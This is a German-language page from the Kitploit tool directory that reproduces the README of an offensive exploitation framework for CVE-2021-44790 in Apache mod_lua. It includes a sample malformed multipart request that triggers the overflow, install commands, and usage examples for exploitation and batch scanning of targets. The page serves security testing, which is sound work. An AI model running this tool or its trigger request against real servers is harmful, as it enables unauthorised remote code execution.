Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

FeedsKontaktDatenschutz© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790 — Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) – Erweitertes Exploitation-Framework mit Fingerprinting, mehrstufigem Scanning, Plugin-Architektur, professioneller Berichterstattung, Screenshot-Erfassung, SQLite-Datenbank und Erkennung mit über 95 % Konfidenz. Autor: Sudeepa Wanigarathna. | Kitploit
Tools/GitHubGitHub/cerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790
Web-SchwachstellenscannerExploit-FrameworksExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubcerberusmrxi/apache-lua-buffer-overflow-exploit-cve-2021-44790

Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

Repository anzeigen
130vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Apache HTTP Server 2.4.x mod_lua Buffer Overflow (CVE-2021-44790) – Erweitertes Exploitation-Framework mit Fingerprinting, mehrstufigem Scanning, Plugin-Architektur, professioneller Berichterstattung, Screenshot-Erfassung, SQLite-Datenbank und Erkennung mit über 95 % Konfidenz. Autor: Sudeepa Wanigarathna.

Teilen

🔥 CVE-2021-44790 - Apache mod_lua Pufferüberlauf-Ausnutzung

Version Python License CVE Apache CVSS Author


📋 Überblick

Apache mod_lua Pufferüberlauf-Ausnutzung ist eine fortschrittliche Exploitation-Plattform der Enterprise-Klasse für CVE-2021-44790 – eine kritische Pufferüberlauf-Schwachstelle im mod_lua-Modul des Apache HTTP Servers 2.4.x. Dieses Framework bietet umfassendes Fingerprinting, intelligente Skript-Ermittlung, mehrstufiges Scannen und professionelle Berichtsfunktionen mit 95%+ Erkennungssicherheit.

⚡ Hauptfunktionen

FunktionBeschreibung
🔍 Erweitertes FingerprintingErkennung von Apache-Version, mod_lua, Betriebssystem, Architektur, WAF, CDN, Container und Cloud-Anbieter
🎯 Intelligente Ermittlung7+ Ermittlungstechniken, darunter robots.txt, Sitemap, HTML-Parsing und JavaScript-Extraktion
💥 Mehrstufiges ScannenVerbindung → Fingerprint → Ermittlung → Verifizierung → Exploitation → Berichtserstellung
🧩 Erweiterbares Plugin-SystemEinfache Plugin-Entwicklung für zukünftige CVEs
🌐 Intelligente HTTP-EngineVerbindungspooling, Wiederholungsversuche, HTTP/2-Unterstützung, Ratenbegrenzung
📊 Umfassende BerichteJSON, HTML, Markdown, PDF mit interaktiven Dashboards
🎨 Attraktive Terminal-OberflächeRich-Bibliothek mit Fortschrittsbalken, Tabellen und farbcodierter Ausgabe
💾 ForschungsdatenbankSQLite-Speicherung mit vollständigem Scan-Verlauf und Abfrageunterstützung
📸 Screenshot-ErfassungAutomatische Webseiten-Screenshots zur Beweissicherung
🚀 Hohe Leistung20+ parallele Threads, 100+ Verbindungspools

🎯 Schwachstellendetails

AttributWert
CVE-IDCVE-2021-44790
SchwachstellePufferüberlauf (Integer-Unterlauf)
Betroffene SoftwareApache HTTP Server 2.4.0 bis 2.4.51
Behobene VersionApache HTTP Server 2.4.52 und später
Komponentemod_lua-Modul
AngriffsvektorNetzwerk (Remote)
CVSS-Score9.8 (Kritisch)
Auswirkung auf VertraulichkeitHoch
Auswirkung auf IntegritätHoch
Auswirkung auf VerfügbarkeitHoch
Exploit-ReifeProof-of-Concept verfügbar

Technische Beschreibung

Die Schwachstelle befindet sich im mod_lua-Modul bei der Verarbeitung von multipart/form-data-Anfragen. Ein Integer-Unterlauf in der Funktion lua_request_parsebody() kann zu einem Heap-basierten Pufferüberlauf führen, der potenziell eine Remote-Code-Ausführung ermöglicht.

POST /process.lua HTTP/1.1
Host: target.com
Content-Type: multipart/form-data; boundary=4

4
Content-Disposition: form-data; name="name"

0
4

📸 Screenshots

HauptoberflächeFingerprint-Ergebnisse
Scan-FortschrittHTML-Berichts-Dashboard

🚀 Schnellstart

Installation

# Clone the repository
git clone https://github.com/CerberusMrXi/Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790
cd Apache-Lua-Buffer-Overflow-Exploit-CVE-2021-44790

# Install dependencies
pip install -r requirements.txt

# Verify installation
python3 exploit.py --version

Grundlegende Verwendung

# Quick vulnerability scan
python3 exploit.py http://target.com

# Verbose scan with exploitation
python3 exploit.py https://target.com --exploit --verbose

# Generate all reports
python3 exploit.py http://target.com --report all

# Research mode with database
python3 exploit.py http://target.com --research

📋 Detaillierte Verwendung

Kommandozeilenoptionen

python3 exploit.py [TARGET] [OPTIONS]
OptionBeschreibungBeispiel
TARGETZiel-URLhttp://target.com
--config FILEKonfigurationsdatei--config config.yaml
--threads NAnzahl der Threads--threads 30
--timeout NAnfrage-Timeout (Sekunden)--timeout 15
--proxy URLProxy-URL--proxy http://127.0.0.1:8080
--verboseAusführliche Ausgabe--verbose
--scan-onlyScan ohne Exploitation--scan-only
--exploitExploitation aktivieren--exploit
--all-payloadsAlle Payloads verwenden--all-payloads
--report FORMATBerichtsformat (json/html/markdown/all)--report all
--output DIRAusgabeverzeichnis--output /path/to/reports/
--researchForschungsmodus aktivieren--research
--database FILEDatenbankpfad--database luastorm.db
--screenshotScreenshots aufnehmen--screenshot
--batch FILEBatch-Datei mit Zielen--batch targets.txt
--query SQLDatenbankabfrage ausführen--query "SELECT * FROM targets"

Beispiele

1. Grundlegende Schwachstellenbewertung

python3 exploit.py https://example.com --verbose --report all

2. Scan in einer Unternehmensumgebung

python3 exploit.py https://internal-server.com \
    --proxy http://proxy.corp.com:8080 \
    --threads 10 \
    --timeout 15 \
    --verbose \
    --report all \
    --output /var/log/security/

3. Vollständiger Penetrationstest

python3 exploit.py https://client.com \
    --threads 30 \
    --timeout 10 \
    --exploit \
    --all-payloads \
    --report all \
    --screenshot \
    --research \
    --verbose \
    --output /pentest/client_name/

4. Batch-Scanning

python3 exploit.py --batch targets.txt --config config.yaml

5. Datenbankabfragen

# Show all vulnerable targets
python3 exploit.py --query "SELECT * FROM targets WHERE vulnerable=1"

# Get statistics
python3 exploit.py --query "SELECT COUNT(*) as total, SUM(vulnerable) as vulnerable FROM targets"

⚙️ Konfiguration

config.yaml

# ----------------------------------------------------------------------------
# LuaStorm Exploit Framework - Configuration File
# ----------------------------------------------------------------------------
Tool herunterladen